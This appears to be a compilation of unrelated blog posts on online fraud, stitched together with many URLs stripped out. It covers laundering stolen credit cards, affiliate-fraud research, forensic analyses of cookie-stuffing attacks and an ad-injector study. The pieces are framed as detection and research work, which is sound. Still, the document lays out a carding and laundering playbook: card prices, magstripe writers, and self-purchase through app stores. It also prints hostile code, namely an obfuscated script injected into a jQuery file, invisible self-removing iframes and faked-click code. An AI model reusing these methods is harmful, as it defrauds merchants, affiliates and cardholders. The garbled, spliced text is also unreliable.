Fraudster on the roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.


I spend a lot of time thinking about the underground economy. What’s always fascinating to me is that the Web seems to provide a false sense of security to scammers who feel nothing flaunting their illegal services in full view of authorities and anyone that really cares to take a look. is a surprising resource here. Point your browser to your favorite search engine and type in the following query:


The thousands of results returned include scammers that are selling everything from card data to bank logins, botnets, paypal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

United States American Express $7.00
United States Discover $8.00
United States Visa & Mastercard $4.50
Europe American Express $12.50
Europe Discover $18.00
Europe Visa & Mastercard $14.50
Asia American Express $18.00
Asia Discover $18.00
Asia Visa & Mastercard $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often does one hear about ‘data breach here’ and ‘millions of accounts compromised there’ but how does this equate to scammers making money? I’m not talking about scammers that sell the data card by card, I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could go buy a whole bunch of items from an online market and then resell them. But where would one deliver the goods from the initial purchase to? An entry level scammer may interrupt now and say that you don’t deliver it to yourself, because the goal is to launder the card as quick as you can and make a clean getaway. One way to do this is sell items at a discount on online market A, once these sell then you buy the product through online market B with the stolen card and ship to the buyer from market A. Easy.

It’s a simple scam but scammers are lazy and this sounds like too much work. Mostly in the sense that it takes so long to make it all happen. Money would only slowly trickle in and by the time it starts any meaningful income then the account on A could get closed at any time (buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (detection), but from what I have read it’s surprisingly easier to get up to speed here than I thought it would be. A few searches on eBay for the model number of a card writer (“MSR605″) yields a list of auctions with card writers that are ready to roll for less than $150.

ebay-writer-0  ebay-writer-1ebay-writer-2Note that the software provided with the writer facilitates pushing track 1/2/3 data onto an offline card. Track 1/2/3 is the credit card data for sale on the underground economy — it is stored on the magnetic stripe of your card

credit card track 2 data

A scammer that is printing his/her own cards can then purchase fairly expensive and hard to track items from offline stores (jewelry) which can then be sold for sale at a discounted rate online. Since the scammer paid nothing for the items that have been purchased, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, and making sure only to purchase hard to track items, mitigates the risk of the scammer’s online account responsible for sales being reported and his efforts going to waste.

As mentioned earlier, there’s a fair amount more risk involved with this scam, in the sense of getting caught and going to jail. Obviously moving the scam offline means that the scammer has to participate in the physical world that is bound to the same laws of the people that he/she is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops whilst putting on a ruse for the scammer. A card could have been reported as stolen between purchasing the data and printing it to a card, prompting a call to the credit card company when swiping the card.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

scammer hustle and flow

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. Scammer will buy goods using a stolen credit and sell them at a discounted price to a buyer through the market. Merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another perhaps a more strategic fraudster would present his thoughts on their weakest links in the ecosystem

“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good’ol wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest asset if we want to be successful in the future”

He’d then present something similar to the following:

scammer hustle and flow 2

Now it’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. So ultimately what the fraudster is saying, is why waste time with merchants and legitimate buyers when the enterprising fraudster can be both!

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Just think about it a little, fraudsters can sell something that cost next to nothing to build (basically it’s just the cost of cycles on their CPU to build an empty app) and the market will happily onboard yet another publisher in their ever increasing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.”

Affiliate programs vary dramatically in their incidence of fraud: in some merchants’ affiliate programs, rogue affiliates fill the ranks of high-earners.  Yet other similarly-sized merchants have little or no fraud.  Why the difference?

In Information and Incentives in Online Affiliate Marketing, Ben Edelman and I examine the impact of varying merchant management decisions.  Some merchants hire specialist outside advisors (“outsourced program managers” or OPM’s) to set and enforce program rules.  Others ask affiliate network staff to make these decisions.  Still others handle these tasks internally.

A merchant’s choice of management structure has significant implications for both the information available to decision-makers and the incentives that motivate those decision-makers.  Outside advisors tend to have better information: An OPM sees problems and trends across its many clients.  A network is even better positioned – enjoying direct access to log files, custom reports, and problems reported by any merchant in the network.  That said, outside advisors usually suffer clear incentive problems: most notably, networks are usually paid in proportion to a merchant’s affiliate channel spending, so networks have a significant incentive to encourage merchants to accept even undesirable affiliates.  In contrast, merchants’ own staff typically have incentives more closely aligned with the merchant’s genuine objectives.  For example, many in-house affiliate managers have stock, options, or bonus that depend on company profitability.  And working in a company builds intrinsic motivation and loyalty.  In short, there are some reasons to think outsourced specialists will yield superior results, but other reasons to favor in-house staff.

To separate these effects, we used crawlers to examine affiliate fraud at what we believe to be an unprecedented scope.  We automated more than 2 million page-loads on a variety of computers and virtual computers, examining the relative susceptibility of all CJ, LinkShare, and Google Affiliate Network merchants (as of spring 2012) to adware, cookie-stuffing, typosquatting, and loyalty apps.

We found outside advisors best able to find the “clear fraud” of adware and cookie-stuffing that are plainly prohibited by network rules.  But in-house staff do better at avoiding “grey area” practices such as typosquatting – schemes less plainly prohibited by network rules, yet still contrary to merchants’ interests.  On balance, there are good reasons to favor each approach – but a merchant choosing outsourced management should be sure to insist on borderline decisions always taken with the merchant’s interests at heart; and a merchant managing its programs in-house should be careful to avoid known cheaters a savvy specialist would more often exclude.

Incidental to our analysis of management structure, we also collected significant data about the scope of affiliate fraud more generally.  Some differences are stark: For example, Table 4 of the article reports Google Affiliate Network merchants suffering, on average, less than half as much adware and cookie-stuffing as LinkShare merchants.  Edelman has been critical of Google on many issues, but when it comes to affiliate quality, GAN was impressive.  GAN’s focus on affiliate quality comes through clearly in our large-sample data.

Our full analysis is under review by an academic journal. ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up is going to result in a request which is then responsible for requesting The ASP file returns a list of URLs (affiliate clicks included), the Flash payload in the browser then invisibly requests each of the links and cookies returned in these lookups result in forced/faked affiliate clicks.

The question now is where does the initial request to come from, i.e., what exactly is responsible for it? If you do a search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you do a dynamic search (via the DOM) you’re still not going to find it. Babyface is somewhat predictable in that like much of the technical marvels blackhats in this space, he was not the brightest bulb on the ever shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at and you’ll find what looks to be a Jquery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires.../code>

In compromising this site, he has hidden his activities in this Jquery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time 
// loads on a javascript enabled browser
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      var c=document;
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals ""
      var p=String.fromCharCode(
        + "?i=" + (new Date()).valueOf();
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';

So the JavaScript above answers our earlier question of what is responsible for the request to The SWF that is loaded a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.display.*;
    import flash.system.*; 
    public dynamic class MainTimeline extends movieclip {
        public var loader:URLLoader;
        public var url:string;
        public var reqURL:URLRequest;
        public function MainTimeline(){
            addFrameScript(0, frame1);
        function frame1(){
            url = "";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = nan;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(;
            safe = new number(["safe"]);
            url1 = new string(["url1"]);
            url2 = new string(["url2"]);
            url3 = new string(["url3"]);
            url4 = new string(["url4"]);
            url5 = new string(["url5"]);
            url6 = new string(["url6"]);
            url7 = new string(["url7"]);
            url8 = new string(["url8"]);
            url9 = new string(["url9"]);
            url10 = new string(["url10"]);
            url11 = new string(["url11"]);
            url12 = new string(["url12"]);
            url13 = new string(["url13"]);
            url14 = new string(["url14"]);
            url15 = new string(["url15"]);
            url16 = new string(["url16"]);
            url17 = new string(["url17"]);
            url18 = new string(["url18"]);
            url19 = new string(["url19"]);
            url20 = new string(["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                } catch(e:error) {

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

We’ve recently been watching an Amazon Associates fraudster taking remarkable efforts to cover his tracks.  Like many rogue Associates we’ve looked at, he’s stuffing cookies invisibly.  He’s using Flash-based stuffing, a technique first written up last year.  But he’s several notches more sophisticated than most:

The fraudster begins by buying a 125×125 IFRAME in the targeted site, here (much like the fraudster who targeted Venturebeat).

phonearena - affiliate fraud 1

But his Flash creates a doubly-invisible IFRAME — setting CSS visibility to “hidden” and also setting width and height to just 1 pixel each:"function(fffff) 
  var xxxxx = document.createElement (\'iframe\'); = \'xxxxx\'; = \'xxxxx\'; = \'hidden\'; = \'1px\'; = \'1px\'; 
  var yyyyy = document.body; 
  yyyyy.appendChild (xxxxx); ...

If you’re hoping to see the fraudster’s IFRAME with ordinary visual inspection, you’ll be disappointed: it’s doubly-invisible, as instructed by the preceding code.

Second, the fraudster uses JavaScript to remove the IFRAME that stuffs Amazon cookies, just ten seconds after the IFRAME loads:

xxxxx.onload = function() 
  setTimeout (function() 
   {yyyyy.removeChild (xxxxx);}, 10000); 
 xxxxx.src = fffff; }", arg1);

Any investigator wanting to find the fraudster’s IFRAME by inspecting the page DOM would have just ten seconds to do so — usually not enough.

Third, this fraudster is rotating among many Amazon Associates IDs.  We found one several months ago, then thirteen more this month.  By using multiple accounts, the fraudster spreads his earnings, and no single account stands out as unreasonably large.  Using many company names is relatively standard among folks with something to hide — recall Direct Revenue’s dozens of company names;.  (By using multiple names, companies seek to avoid the notoreity and additional scrutiny that could result from a single large identity.)  In contrast, any legitimate affiliate would want credit, recognition, and extra payment for its high traffic volume.  So spreading traffic across multiple IDs confirms that this fraudster knows it is breaking Amazon’s rules.

Relatedly, this fraudster carefully uses JavaScript to fake clicks such that HTTP Referers and other characteristics look legitimate when traffic reaches Amazon.  This method automatically causes HTTP Referer fields to take values consistent with the Associate IDs described above.  Here’s a sample of the code that fakes a click and causes HTTP Referers to flow accordingly:

var url="";
var xxx = document.createElement ("a");
if (typeof( == 'undefined')
{ location.href = url;  }
{ xxx.href = url; document.body.appendChild(xxx);; }

Fourth, this fraudster is unusually cautious in how many users he stuffs.  In our testing, his ad stuffs only about one third of users.  Furthermore, he stuffs only on the first visit.  If your IP is not selected on the first visit, you will never be stuffed on any subsequent visit, no matter how many times you revisit.  He also limits his stuffing to certain geographies and with other restrictions we’ll save for another write-up.  Of course this caution comes at a cost — less stuffing relative to his media-buying costs — but the fraudster seems to find this profitable.  Specifically, this reduces his likelihood of detection — letting him continue at greater length.  Combining this caution with the fraudster’s use of Flash, double invisibility, and ten-second automatic removal from the DOM — and he’s unusually hard to catch.

How much money is this fraudster making?  We don’t know for sure, and Amazon has no reason to say.  But the fraudster is buying display ad space on a popular site (Alexa ranking <1500).  That can’t be cheap, and he must anticipate earning money more than enough to cover his costs.  As best we can tell, Amazon Associates is this fraudster’s entire business model, with no other networks being targeted — meaning that Amazon is paying the entire cost of this fraudster’s scheme.

Of course users see nothing — not even an extra popup or popunder.  Users do get a bit of bandwidth wasted by the extra page-load, but even folks on a mobile data plan probably wouldn’t notice.  The big loser is Amazon — paying affiliate fees, as much as 8%, to get traffic it otherwise would have received completely free.  We’re also struck by the losses to other affiliates: If another affiliate truly referred the user to Amazon, but this fraudster interceded to stuff its cookie, then the honest affiliate’s commission is stolen by this fraudster.

Here’s a sampling of the Amazon Associates IDs we’ve seen this fraudster using:


Full packet log of our first observation of this fraudster’s activities available here.

We call this fraudster Cellphonetech because his controlling server is cellphonetech dot net.  WHOIS indicates that the registrant is Lin Yong of Fujian China, email address

Cost Per Lead (CPL) is an advertising model where the advertiser pays for sign-ups from interested consumers. Affiliates play the middle men in these transactions for they send the interested consumers in the direction of the advertiser. So for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto the affiliates, advertisers are spared the hassle of everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser. world of tanks affiliate fraudNote the following:

  • Commission rate of “$2.65″/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates can not encourage consumers to sign-up with the advertiser by offering rewards the likes of cash or points in some program.

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):
world-of-tanks-2Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in USA or Canada who will sign up using the link that has been provided. This is a packet trace of me following the link using my browser, the screenshot below shows the result.

world of tanks affiliate fraud This is what’s going on in the packet trace:

  1. Subscriber in the online forum decides he wants the $0.40 on offer in the online form
  2. He/she starts the task by navigating to
  3. Tinyurl redirects to which then uses Javascript and an HTML form to redirect the browser to (this essentially launders the referrer)
  4. sets up a full screen iframe which contains which redirects to the following affiliate click URL:;c=63867&amp;a=105565&amp;s1=tanks
  5. This URl redirects to which redirects to

So what you have here is an affiliate taking advantage of a price differentiation in two markets. Of course, one of these markets is of his own creation, but essentially this equates to arbitrage (pay $0.40 and sell $2.65) and a bad deal for Worldoftanks (the poor advertiser that bankrolls this operation).

Ad injectors insert ads into others’ sites, without permission from those sites and without payment to those sites. See example screenshots below showing injections into YouTube, Amazon, CNN, Dell, and eBay.

ad injectors ad injectors
ad injectors ad injectors
ad injectors ad injectors

In this article, we review the basic operation of ad injectors, then examine the ad networks, exchanges, and other intermediaries that broker the placement of advertising through injectors.
We focus on advertisers and ad networks because their payments are the sole funding of most ad injectors. If advertisers and ad brokers universally rejected injector traffic as improper and unwanted, then injectors would have no reason to exist, no means to pay to get installed on users’ computers, and no reason to continue operation.

We also report which advertisers most often advertise through injectors. Whether through complexity, inattention, or indifference, these advertisers’ expenditures are ultimately the sole revenue source for injectors.

The Business of Ad Injection

To modify the appearance of targeted sites, injectors rely on software installed on users’ computers. Injectors largely target Windows users, though in many instances injectors modify  Chrome and Firefox in addition to Internet Explorer. The restricted architecture of mobile devices and tablets currently largely protects those platforms from ad injectors.

We currently primarily see injectors becoming installed through bundles — often, including an injector when a user seeks entirely unrelated software. Typically, the inclusion of the injector is disclosed only midway through the installation process of software that is purportedly “free.” We struggle to reconcile mid-installation disclosure with the “outset of the offer” requirement in the FTC’s Guide Concerning Use of the Word “Free” and Similar Representations: The FTC instructs that if a “free” offer is contingent on other obligations, those obligations must be disclosed at the outset of the offer, not midway through.

A separate potential concern comes from installation disclosures that are less than forthright. For example,  injector installation disclosures often state that ads may be displayed “when you browse the web.” This vague disclosure is at best unclear as to where ads will appear, giving consumers little warning that ads will in fact be inserted to appear within the sites users view. Consumers have little reason to suspect that installing a program can change the appearance of entirely unrelated web sites, and this vague disclosure, lacking in specifics and appearing midway through an installation process,  fails to tell consumers what they are purportedly accepting.

While concern at injectors has grown over the past two years, injectors are actually longstanding. In 2001, adware pioneer Gator began distributing software that would seek standard-sized banner ads and cover them with Gator’s own ads. When the Internet Advertising Bureau criticized this practice, Gator filed suit — though Gator then abandoned banner replacement in favor of the popup ads for which Gator is more widely remembered. Meanwhile, other injectors continued where Gator had led. For example, in 2007 Edelman reported AT&T, Travelocity, and Vonage advertising through the Fullcontext ad injector. (As those screenshots show, Fullcontext placed banners, among other locations, into the top of– a location where no third-party ads are ordinarily available at any price.) More recently, Brandi reported ads injected into Google, Amazon, eBay, and Wikipedia, notwithstanding Wikipedia’s refusal to sell ads at all and the other sites’ refusal to sell ads in the place, size, and quantity that this injector caused.’s August 2013 screenshots add dozen more examples.

Ad injection has proven  lucrative. As of November 2011, court filings reveal that a single injector maker, Sambreel, enjoyed monthly revenue in excess of $8 million.  Sambreel incurred costs in paying partners to install its software on users’ computers. But Sambreel did not need to write articles, produce videos, or otherwise create original content — in sharp contrast to the publishers whose sites were targeted for injected ads from Sambreel.

Ad injectors raise weighty questions. Consumers are rightly concerned about installation methods and possible harms to privacy, computer reliability, and performance. Sites are concerned about users misattributing injectors’ banners: users would understandably blame web sites for excessive or inappropriate advertising. Sites also perceive unfairness when injectors place ads in content they did not create: Having  prepared that content, sometimes at considerable expense, site operators are alarmed to see the fruits of their efforts flowing to others. We credit the importance of these questions but defer them to the future. Instead, we now turn to identifying the  networks and other intermediaries that transfer funds from advertisers to ad injectors.

The Relationships Supporting Ad Injectors

In principle ad injectors could attempt to sell ad placements directly to advertisers. At the right price, some advertisers might be receptive. Injectors’ offerings would no doubt be more attractive because injectors offer placements in sites that otherwise refuse advertising (e.g. Wikipedia) and because injectors offer placements more prominent than sites otherwise offer (e.g. oversized ads above the fold on Direct sales would let injectors’ staff personally explain the placements they are offering, and advertisers could make informed, considered decisions.

Instead, in our testing, ad injectors  sell through a web of networks, exchanges, and other intermediaries. On the most favorable view, these intermediaries improve efficiency: Specialist brokers know how to work with advertising buyers and have built systems to optimize ad placements by putting each ad in the locations where it performs best. But these intermediaries create additional complexity that tends to undermine accountability. For example, if traffic flows from an injector to intermediary A to B to C to D to an advertiser, the advertiser may never be told that it is actually buying injector traffic rather than (or in addition to) placements in genuine web sites. Meanwhile, even if some intermediary D figures out that C is sending injector traffic, and even if D refuses to accept that traffic, injection inventory may continue to reach D via other methods — perhaps A to B to E to D. So even diligent intermediaries can find themselves receiving and passing along injector traffic they do not want.

Our first example above, showing an AT&T ad injected into the top of, is unusually simple. Forensically, we found that the placement flowed from Sambreel’s Webcake injector to Sambreel’s Ztstatic and Amasvc servers, which passed an impression to AOL Then AOL returned the AT&T ad visible in the screenshot. We preserved a packet log of the network transmissions associated with this placement. Despite the simplicity, it is unlikely that AT&T knew it was receiving ads through adware or ad injectors. Indeed, touts “better inventory” including “74 of comScore’s top 100 sites” as the primary reason (top-listed reason on AOL’s site) to buy placements from An advertiser buying from has no reason to suspect that injections will be included.

The money trail – how funds flow from advertisers to the Peachfuzz injector:

The money trail - how funds flow from advertisers to the Peachfuzz injector.

In other instances, the placement chain can be significantly more complicated. For example, see the second example above, showing a Chevrolet ad injected into the top of YouTube. There, the Peachfuzz injector used an Akamai ad server to pass an injected impression to which returns Z5X tags passing the impression through the App Nexus marketplace. Next App Nexus returns DoubleClick tags with account code N4694.Beep346, yielding tags from Goodway Group, a digital marketing service provider. Finally, Goodway Group returns an ad for Chevrolet. See the diagram at left. This  placement chain is typical of the injections we have examined.

In the subsequent sections, we run a similar analysis at large scale and using automation in order to inventory the responsible intermediaries, including intermediary chains that are significantly longer and more complex.


We installed a variety of ad injectors on test computers in our labs. We built an automated system to retrieve, analyze, and preserve injected ads from numerous computers around the world, and we monitored the resulting responses to determine the hosts that receive and pass along the resulting traffic. Our methodology allows us to observe all ad networks, ad exchanges, and other advertising intermediaries between an injection and the resulting advertisement. We transfer that data to a relational database for analysis, tabulation, and charting.

Our analysis includes all exchanges and networks that have the ability to prevent ads from being placed into injectors (even if these companies elect not to exercise this right). We attempt to omit passive tool providers with neither the right nor the ability to prevent ads from being served. For example, if a tool provider serves only to count impressions or clicks, that vendor would have little ability to prevent an injector from serving an ad. These exclusions are manual and inevitably imperfect — particularly for hosts that lack clear indication of their function and/or serve multiple functions.

For ease of interpretation, we label most frequently-observed hosts with company names in lieu of domain names.


In testing of September 5 to 12, 2013, we checked the advertisements loaded by three leading different ad injectors. We checked each injector at least ten thousand times from a mix of fourteen different locations in eight countries, in order to obtain a mix of ads. All testing occurred on virtual computers without prior browsing (hence without cookies inviting particular ad targeting or retargeting).

The tables and charts below present the intermediaries receiving traffic from the ad injectors we examined. In each table, the left column reports the intermediaries most often directly or indirectly receiving traffic from the specified ad injector. The third column summarizes the brokers most often passing the traffic from the injector to that intermediary: Some intermediaries disproportionately receive traffic directly from the injector, while other traffic tends to flow from injector to one or more brokers to the specified intermediary.

AddLyrics  Injector – Graph of Intermediaries and Advertisers

In testing of September 6-12, 2013, we examined ads loaded by the AddLyrics ad injector. We checked injected ads 45,854 times. We monitored the resulting responses to determine the hosts that receive and pass along the resulting traffic. In the graph below we depict the ad networks, ad exchanges, and other advertising intermediaries (shown as ellipses in the graph) between an AddLyrics injection and the resulting advertisement (diamonds in the graph). We also reports the advertisers most frequently observed. Color brightness and node size indicate the relative frequency of impressions to/via a given intermediary or advertiser.

Intermediaries brokering placements from AddLyrics

Intermediary Num. obs. Selected intermediaries sending impressions to that intermediary 14001 AppNexus (13998), (3)
AppNexus 11854 (4131), DNSR Media Group (2436), Yahoo Right Media (823)
Google DoubleClick 7159 AppNexus (2328), Invite Media (Google) (283), (267) 6265 AddLyrics Injector (6247), AppNexus (18)
Yahoo Right Media 5287 Yahoo (2235), AppNexus (859), Turn (243)
RewardsArcade 5177 (95), AppNexus (22), (5)
Yahoo 4492 Yahoo Right Media (2304), AppNexus (515), (199)
ContextWeb (DatranMedia / PulsePoint) 4273 AppNexus (292), (272), Turn (241) 3288
Adap.TV 3102 (709), Turn (337), Neustar AdAdvisor (279)
Google 2750 Google DoubleClick (1249), (28), AppNexus (26)

Complete list of intermediaries available here

Advertisers receiving impressions from AddLyrics

Advertiser Num. obs. Selected intermediaries sending impressions to that advertiser
Systweak 7230 AppNexus,, Yahoo Right Media 3403, AppNexus 2882 AppNexus, 1891, AppNexus 1441, AppNexus 1347 AppNexus, 1336,
Medical News Reporter 1039 AppNexus,, 1016 903 AppNexus,, 899 SiteScout 899 AppNexus,

Complete list of advertisers available here

PeachFuzz Injector – Graph of Intermediaries and Advertisers

In testing of September 6-12, 2013, we examined ads loaded by the PeachFuzz ad injector. We checked injected ads 48,653 times.

Intermediaries brokering placements from PeachFuzz

Intermediary Num. obs. Selected intermediaries sending impressions to that intermediary
AppNexus 49829* (14558), DNSR Media Group (4328), (3668) 35830 Peachfuzz Injector (35808), Adknowledge (14), AppNexus (8)
Google DoubleClick 26877 AppNexus (4163), MathTag (2239), Invite Media (Google) (1567)
Yahoo Right Media 18323 Yahoo (6322), AppNexus (1932), (1425)
Yahoo 12292 Yahoo Right Media (6369), Adknowledge (1112), (1025)
OpenX 11378 Adknowledge (2587), Rocket Fuel Inc. (2502), AppNexus (2437)
Google 11158 Google DoubleClick (5148), (1040), Underdog Media (434)
Turn 9405 OpenX (2484), AppNexus (1070), Yahoo Right Media (1022)
RewardsArcade 9235 (5067), (2842), (119)
eXelate 7729 Neustar AdAdvisor (999), Google DoubleClick (985), Btrll (893) 7559 AppNexus (2985), Google DoubleClick (744), Adknowledge (430)

* – We saw more than one App Nexus ad call in many Peachfuzz injection impressions. Example: Peachfuzz to App Nexus to some network X to App Nexus to some network Y to an advertiser. The number of App Nexus ad calls thus exceeds the number of Peachfuzz impressions we checked.

Complete list of intermediaries available here

Advertisers receiving impressions from PeachFuzz

Advertiser Num. obs. Selected intermediaries sending impressions to that advertiser
QuiBids 2116 OmniTarget, AppNexus
Living Research Institute 2086 Platinum Success
Draft Street 2041
Pimsleur Approach 1164
Medical News Reporter 995 AppNexus,, Yahoo Right Media
Anastasia Date 924, AppNexus
Lower My Bills 912 AppNexus, Microsoft, Underdog Media 866, AppNexus
Brightroll 854 AppNexus, Btrll 783 Secco Squared, 715 AppNexus,

Complete list of advertisers available here

WebCake Injector – Graph of Intermediaries and Advertisers

In testing of September 5-12, 2013, we examined ads loaded by the WebCake ad injector. We checked injected ads 15,834 times.

Intermediaries brokering placements from WebCake

Intermediary Num. obs. Selected intermediaries sending impressions to that intermediary
AppNexus 13368 Webcake Injector (2606), (1561), Microsoft (1265)
Google DoubleClick 7363 Webcake Injector (930), AppNexus (655), Btrll (422) 6067 6045
OpenX 5016 Adknowledge (1363), AppNexus (1259), Rocket Fuel Inc. (1100)
Yahoo Right Media 4806 Yahoo (1656), Webcake Injector (1187), AppNexus (518) 3705 Webcake Injector (3705)
Yahoo 3306 Yahoo Right Media (1669), Webcake Injector (1187), Turn (68)
eXelate 3078 Btrll (372), Google DoubleClick (363), Neustar AdAdvisor (360)
Turn 2967 OpenX (1072), Btrll (621), eXelate (318)
Adknowledge 2721 OpenX (1329), Webcake Injector (1066), AppNexus (293)
Bluekai 2698 Btrll (427), MathTag (425), Google DoubleClick (389)
Accuen 2446 Turn (1089), OpenX (1012), eXelate (315)
Btrll 1903 AppNexus (411), Datalogix (382), eXelate (381)
Rocket Fuel Inc. 1875 OpenX (1085), Btrll (621), Lijit (79) 1596 AppNexus (700), Webcake Injector (393), Google DoubleClick (286)

Complete list of intermediaries available here

Advertisers receiving impressions from WebCake

Advertiser Num. obs. Selected intermediaries sending impressions to that advertiser 6102, Webcake Injector
Appround 450, AppNexus
Brightroll 406 AppNexus, Btrll, Adknowledge 156 Google DoubleClick, Webcake Injector, Adknowledge
